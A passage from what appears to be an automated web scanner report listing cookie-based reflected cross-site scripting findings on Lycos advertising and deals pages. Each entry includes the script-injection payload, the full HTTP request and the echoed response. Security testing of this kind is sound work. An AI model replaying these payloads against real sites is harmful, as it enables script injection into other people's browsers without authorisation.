Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc";alert(1)//75d1be7661c.lycos.com"
});
</script>
...[SNIP]...

1.148. http://advertising.lycos.com/lycos.xml [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /lycos.xml

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532cd"><script>alert(1)</script>325056d76aa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /lycos.xml HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.149. http://deals.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ccd"%3balert(1)//96aec635ab1 was submitted in the diktfc cookie. This input was echoed as 97ccd";alert(1)//96aec635ab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd"%3balert(1)//96aec635ab1

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd";alert(1)//96aec635ab1"
});
</script>
...[SNIP]...

1.150. http://deals.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4848d"><script>alert(1)</script>8271264fa99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99&amp;cj=1" alt="tracker" />
...[SNIP]...

1.151. http://deals.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b481"><script>alert(1)</script>a5c183e28ee was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/bootstrap.js&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee&amp;cj=1" alt="tracker" />
...[SNIP]...

1.152. http://deals.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3373"%3balert(1)//cb851bc2ef was submitted in the diktfc cookie. This input was echoed as a3373";alert(1)//cb851bc2ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373"%3balert(1)//cb851bc2ef; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/bootstrap.js",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373";alert(1)//cb851bc2ef"
});
</script>
...[SNIP]...

1.153. http://deals.lycos.com/coupons [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a25a4"%3balert(1)//d3e20f2e46f was submitted in the diktfc cookie. This input was echoed as a25a4";alert(1)//d3e20f2e46f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4"%3balert(1)//d3e20f2e46f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/coupons",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4";alert(1)//d3e20f2e46f"
});
</script>
...[SNIP]...

1.154. http://deals.lycos.com/coupons [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ede"><script>alert(1)</script>07af65f492e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/coupons&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.155. http://deals.lycos.com/coupons/stores [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons/stores

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891ef"><script>alert(1)</script>40c20ce42a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/coupons/stores&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.156. http://deals.lycos.com/coupons/stores [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons/stores

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c07ea"%3balert(1)//565a1b485f was submitted in the diktfc cookie. This input was echoed as c07ea";alert(1)//565a1b485f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea"%3balert(1)//565a1b485f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/coupons/stores",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea";alert(1)//565a1b485f"
});
</script>
...[SNIP]...

1.157. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d1"%3balert(1)//99923b16c8b was submitted in the diktfc cookie. This input was echoed as bd5d1";alert(1)//99923b16c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1"%3balert(1)//99923b16c8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1";alert(1)//99923b16c8b"
});
</script>
...[SNIP]...

1.158. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa21f"><script>alert(1)</script>c82f0e9250f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17815

